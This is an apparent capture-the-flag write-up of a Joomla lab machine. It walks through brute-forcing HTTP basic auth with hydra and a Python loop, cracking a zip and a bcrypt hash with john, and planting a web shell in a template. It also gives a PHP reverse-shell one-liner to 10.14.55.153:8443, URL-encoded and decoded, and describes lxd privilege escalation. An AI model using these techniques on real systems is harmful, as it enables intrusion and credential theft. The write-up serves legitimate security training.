Target IP: 10.10.117.63
Three TCP ports are open on the target machine: SSH, HTTP on port 80, and a second HTTP application on port 8080.
Port 80: HTTP
The webpage above is displayed for this application. Viewing the source code of this webpage reveals the different Joker quotes.
Running a directory search with the command gobuster dir -u http://10.10.117.63 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt against this application reveals the details shown above. The phpinfo.php page gives more information about the host, such as the PHP version, loaded modules and configuration paths.
The secret.txt contains the message above, which gives two possible usernames, Batman and Joker, to target against SSH and the other HTTP application if it supports a login. I tried other wordlists but could not find further directories.
Port 8080: HTTP
This application prompts for a login. Using curl against this port produces the output above.
Using hydra with the command hydra -l joker -P /usr/share/wordlists/rockyou.txt 10.10.117.63 -s 8080 http-get (the http-get module attacks HTTP basic authentication), I brute-forced the password of the user joker for the HTTP application on port 8080. Now I have the credential joker:hannah.
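What hydra's http-get module is doing under the hood, as an added example that is not part of the original write-up: basic auth is just "user:password" base64-encoded in an Authorization header, so a guess is one GET per password and a 401 means "wrong". The fake_probe below is a constructed stand-in for the port-8080 realm (it accepts only joker:hannah) so the block runs offline; live_probe is the real request you would point at http://10.10.117.63:8080/ and is not called here. The sample wordlist is constructed; a real run walks rockyou.txt.

```python
import base64
import urllib.error
import urllib.request
from typing import Callable, Iterable, Optional


def basic_auth_header(user: str, password: str) -> dict:
    """Build the Authorization header a client sends for HTTP basic auth.
    The credential is only base64-encoded, not encrypted, so over plain HTTP it
    is both sniffable and trivially guessable."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


def brute_force_basic(probe: Callable[[dict], int], user: str,
                      wordlist: Iterable[str]) -> Optional[str]:
    """Try each password in turn; probe(headers) returns the HTTP status code.
    401 means the server rejected the credential, anything else is a hit.
    This is the same loop hydra runs, just without its parallel workers."""
    for password in wordlist:
        if probe(basic_auth_header(user, password)) != 401:
            return password
    return None


def live_probe(url: str, timeout: float = 10.0) -> Callable[[dict], int]:
    """Return a probe that sends a real GET to url (not executed in this example)."""
    def probe(headers: dict) -> int:
        req = urllib.request.Request(url, headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status
        except urllib.error.HTTPError as err:
            return err.code  # 401 for a bad credential, 403/404/... otherwise
    return probe


def fake_probe(headers: dict) -> int:
    """Constructed stand-in for the target's basic-auth realm: only joker:hannah
    (the credential recovered in the write-up) is accepted."""
    value = headers.get("Authorization", "")
    if not value.startswith("Basic "):
        return 401
    try:
        creds = base64.b64decode(value[len("Basic "):]).decode()
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return 401
    return 200 if creds == "joker:hannah" else 401


# Constructed, tiny wordlist standing in for rockyou.txt.
SAMPLE_WORDLIST = ["password", "123456", "batman", "hannah", "joker"]

if __name__ == "__main__":
    print(brute_force_basic(fake_probe, "joker", SAMPLE_WORDLIST))
```

Note that a status-code check is only as good as the server's behaviour: a realm that answers 200 with an error page, or a lockout that starts returning 403, would both register as a "hit", so verify any result with a manual request before building on it.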
I logged in using the credential above and now have access to the CMS.
Browsing to /robots.txt shows the entries above.
The /administrator entry looks interesting as it is the admin panel, but it needs a username and password. Trying default credentials did not work either.
Performing a directory search with the credentials reveals an interesting file called backup.zip. I downloaded it to my machine, but it is password protected.
Using john I obtained the password of this backup.zip file: hannah. Password reuse like this is worth trying everywhere a credential has already been recovered.
I found an interesting file called configuration.php. It contains the application's username and password in plaintext, but I was unable to log in using them. I also notice that the database name for this application is joomladb.
Looking through the contents of joomladb.sql, I notice the interesting table shown above: there is a user called admin with the password hash $2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG. The $2y$ prefix marks a bcrypt hash (PHP's password_hash output) with cost 10, which john handles with --format=bcrypt. I copied this hash to my local machine.
After running john on the hash, I obtained the password abcd1234 for the user admin, which should allow logging in to the Joomla administrator panel.
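Pulling the user hashes out of a dump like joomladb.sql and deciding how to crack them, as an added example that is not part of the original write-up: the block parses INSERT statements for any *_users table, identifies the hash format from its prefix and returns the user:hash lines john expects. The sample dump is constructed (table prefix, columns, e-mail addresses and the second user are assumptions); only the admin hash is the one taken from the write-up above.

```python
import re

# Constructed sample in the style of a Joomla users-table dump. Only the admin
# hash is from the write-up; the second row shows Joomla's legacy md5:salt format.
SAMPLE_DUMP = r"""
INSERT INTO `jml_users` (`id`, `name`, `username`, `email`, `password`) VALUES
(42, 'Super User', 'admin', 'admin@example.com', '$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG'),
(43, 'Editor', 'editor', 'editor@example.com', '5f4dcc3b5aa765d61d8327deb882cf99:abcdefghij');
"""

INSERT_RE = re.compile(r"INSERT INTO `?(\w+)`?\s*\(([^)]*)\)\s*VALUES\s*(.*?);", re.S)
ROW_RE = re.compile(r"\(([^()]*)\)")            # one value tuple; dumps do not nest parens
VALUE_RE = re.compile(r"'((?:[^'\\]|\\.)*)'|(-?\d+)|(NULL)")
BCRYPT_RE = re.compile(r"^\$(2[aby])\$(\d{2})\$[./A-Za-z0-9]{53}$")
JOOMLA_MD5_RE = re.compile(r"^[0-9a-f]{32}:[A-Za-z0-9]{1,32}$")  # md5(pass.salt):salt
MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def _parse_values(row: str) -> list:
    """Tokenise one VALUES tuple into Python values (str, int or None)."""
    out = []
    for m in VALUE_RE.finditer(row):
        if m.group(1) is not None:
            out.append(m.group(1))
        elif m.group(2) is not None:
            out.append(int(m.group(2)))
        else:
            out.append(None)
    return out


def extract_hashes(dump: str) -> list:
    """Return [{'table', 'username', 'password'}] for every *_users INSERT in the dump."""
    found = []
    for table, cols, rows in INSERT_RE.findall(dump):
        if not table.endswith("_users"):
            continue
        names = [c.strip(" `") for c in cols.split(",")]
        if "username" not in names or "password" not in names:
            continue
        for row in ROW_RE.findall(rows):
            vals = _parse_values(row)
            if len(vals) != len(names):
                continue  # malformed row: do not mis-align columns silently
            rec = dict(zip(names, vals))
            found.append({"table": table, "username": rec["username"],
                          "password": rec["password"]})
    return found


def describe_hash(h: str) -> dict:
    """Identify the Joomla password hash format and the cracker settings to use."""
    m = BCRYPT_RE.match(h)
    if m:
        cost = int(m.group(2))  # bcrypt runs 2**cost rounds; cost 10 is PHP's default
        return {"algo": "bcrypt", "variant": m.group(1), "cost": cost,
                "rounds": 2 ** cost, "john_format": "bcrypt", "hashcat_mode": 3200}
    if JOOMLA_MD5_RE.match(h):
        return {"algo": "joomla-md5-salted", "hashcat_mode": 11}  # Joomla < 2.5.18
    if MD5_RE.match(h):
        return {"algo": "raw-md5", "john_format": "raw-md5", "hashcat_mode": 0}
    return {"algo": "unknown"}


def john_lines(records: list) -> list:
    """user:hash lines, one per line, as john's input file expects them."""
    return [f"{r['username']}:{r['password']}" for r in records]


if __name__ == "__main__":
    recs = extract_hashes(SAMPLE_DUMP)
    for line in john_lines(recs):
        print(line, describe_hash(line.split(":", 1)[1]))
```

With the admin line saved to a file, the run the write-up describes is john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt; bcrypt at cost 10 is slow by design, so short wordlists and rules before rockyou save a lot of time.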
And boom! I now have access to the Joomla administrator panel using admin:abcd1234. Time to upload a reverse shell!
I notice that the templates can be edited, including Protostar. I will inject my simple web shell into error.php, as shown above.
My web shell is in place and gives me RCE: browsing to http://10.10.117.63:8080/templates/protostar/error.php lets me execute commands. Time to get a full reverse shell.
I now have a full reverse shell connection on port 8443. The PHP payload used is listed below, URL-encoded for the cmd parameter. Time to escalate privileges to root!
PHP payload used (URL-encoded): php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
Decoded, this is php -r '$sock=fsockopen("10.14.55.153",8443);shell_exec("/bin/bash <&3 >&3 2>&3");'. fsockopen() takes the next free descriptor after stdin, stdout and stderr, so the socket is fd 3 and bash reads its input from, and writes its output and errors to, that socket.
Full URL with payload: http://10.10.117.63:8080/templates/protostar/error.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
What? www-data is in the lxd group? Membership of the lxd group is effectively root, because lxd lets its members start a privileged container with the host's filesystem mounted inside it. I can use this to gain a root shell.
I downloaded alpine-v3.13-x86_64-20210218_0139.tar.gz on my machine and transferred it to the target machine to use as the container image. Starting a privileged container from it with the host's root filesystem mounted at /mnt/root gives me a root shell.
The final flag is at /mnt/root/root/final.txt on the new mount, which is /root/final.txt on the host. GG.